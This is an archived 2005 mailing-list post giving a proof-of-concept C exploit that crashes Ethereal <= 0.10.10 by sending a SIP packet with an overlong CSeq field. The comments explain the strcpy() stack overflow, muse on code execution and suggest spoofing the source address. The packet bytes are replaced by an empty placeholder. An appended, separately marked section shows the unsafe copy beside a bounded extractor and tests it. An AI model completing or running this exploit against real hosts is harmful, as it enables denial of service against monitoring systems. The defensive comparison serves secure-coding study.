Date: Wed, 11 May 2005 18:49:22 +0100 (WAT)
From: "Shaun Colley" <>
Subject: Ethereal <= 0.10.10 SIP dissector stack overflow DoS exploit

Proof-of-concept DoS exploit for the ethereal SIP dissector stack overflow
vulnerability discovered by SecurityLab.

/* ethereal_sip_dos.c - by Shaun Colley <shaun rsc cx>
 * This code exploits the Ethereal <= 0.10.10 SIP dissector stack overflow
 * reported by SecurityLab.  See the advisory for more details (i.e. fix) -
 * <>
 * This buffer overflow bug is due to a blind copy of the "CSeq" field in
 * a packet containing a SIP header.
 * If a malformed SIP packet appears on the same interface as the
 * vulnerable Ethereal, Ethereal will strcpy() the SIP header's CSeq field
 * into a buffer without bounds checking.
 * This code transmits a SIP header (in a UDP datagram) with an overly
 * long CSeq field, which results in a stack overflow because of the
 * strcpy().  It is probably possible to execute code, but since Ethereal
 * first validates each byte with an 'isalpha' check, shellcode may have
 * to be printable ASCII-only if the bug were to be exploited.  I am not
 * certain on how easy code execution would be.  Important things get
 * overwritten during the overflow, so the attacker would need to fill
 * them back in themselves.
 * Ethereal have released a patch.  Ethereal 0.10.11 fixes this bug.
 * syntax: ethereal_sip_dos <host> - where <host> is an address that makes
 * the packet appear on the Ethereal host's interface, i.e. target's IP
 * address.
 * This code doesn't spoof the source address - if you care, capture the
 * packet and retransmit it with a spoofed source IP address.
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

/* malformed SIP packet (the packet bytes are missing from the archived
 * post; this PLACEHOLDER only keeps the file compilable) */
char sip_packet[] = "";

int main(int argc, char *argv[]) {
  if(argc < 2) {
    printf("syntax: %s <host>\n", argv[0]);
    return 1;
  }

  struct sockaddr_in dest;
  struct hostent *he;
  int sock, slen = sizeof(struct sockaddr);

  /* resolve the host whose interface the packet should appear on */
  if((he = gethostbyname(argv[1])) == NULL) {
    printf("Couldn't resolve %s\n", argv[1]);
    return 1;
  }

  if((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) {
    return 1;
  }

  /* SIP over UDP, port 5060 */
  dest.sin_port = htons(5060);
  dest.sin_family = AF_INET;
  dest.sin_addr = *((struct in_addr *)he->h_addr);

  if (sendto(sock, sip_packet, sizeof(sip_packet), 0,
             (struct sockaddr *)&dest, slen) == -1) {
    printf("Error sending packet!\n");
    return 1;
  }

  printf("Exploit packet sent..\n");

  return 0;
}
If the code looks screwed, reference:


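The defect the post describes is a blind strcpy() of the CSeq value into a fixed-size stack buffer. As an added example, not part of the post or of Ethereal's own dissector code: the unsafe copy pattern beside a bounded extractor that refuses values that would not fit or contain non-printable bytes, checked against a constructed benign SIP message and a constructed message with a 200-byte CSeq value. CSEQ_MAX, extract_cseq and the sample messages are assumptions of this example.

```c
#include <ctype.h>
#include <string.h>

#define CSEQ_MAX 64   /* assumed size of the dissector's fixed stack buffer */

/* The defect the post describes: strcpy() of the CSeq value into a fixed
 * stack buffer, no length check. For contrast only; never use on input. */
void copy_cseq_unsafe(const char *value, char out[CSEQ_MAX]) {
    strcpy(out, value);
}

/* Bounded version: find the CSeq header, verify the value fits (with its
 * NUL) and is printable, then copy. Returns 0 on success, -1 otherwise.
 * SIP header names are case-insensitive; this example matches "CSeq:" only. */
int extract_cseq(const char *msg, char *out, size_t out_len) {
    const char *p = strstr(msg, "CSeq:");
    if (p == NULL) return -1;
    p += strlen("CSeq:");
    while (*p == ' ' || *p == '\t') p++;
    size_t n = strcspn(p, "\r\n");            /* value ends at end of line */
    if (n >= out_len) return -1;              /* would overflow: reject it */
    for (size_t i = 0; i < n; i++)
        if (!isprint((unsigned char)p[i])) return -1;
    memcpy(out, p, n);
    out[n] = '\0';
    return 0;
}

/* Constructed benign message (not from the original post). */
static const char SIP_OK[] =
    "INVITE sip:bob@example.org SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.0.2.1:5060\r\n"
    "CSeq: 314159 INVITE\r\n\r\n";

/* 1 if the benign sample parses to the expected value. */
int sample_benign_ok(void) {
    char buf[CSEQ_MAX];
    return extract_cseq(SIP_OK, buf, sizeof buf) == 0 &&
           strcmp(buf, "314159 INVITE") == 0;
}

/* Builds a 200-byte CSeq value, far beyond CSEQ_MAX; 1 if it is rejected. */
int sample_oversized_rejected(void) {
    char msg[6 + 200 + 3], buf[CSEQ_MAX];
    memcpy(msg, "CSeq: ", 6);
    memset(msg + 6, 'A', 200);
    memcpy(msg + 206, "\r\n", 3);             /* includes the terminating NUL */
    return extract_cseq(msg, buf, sizeof buf) == -1;
}
```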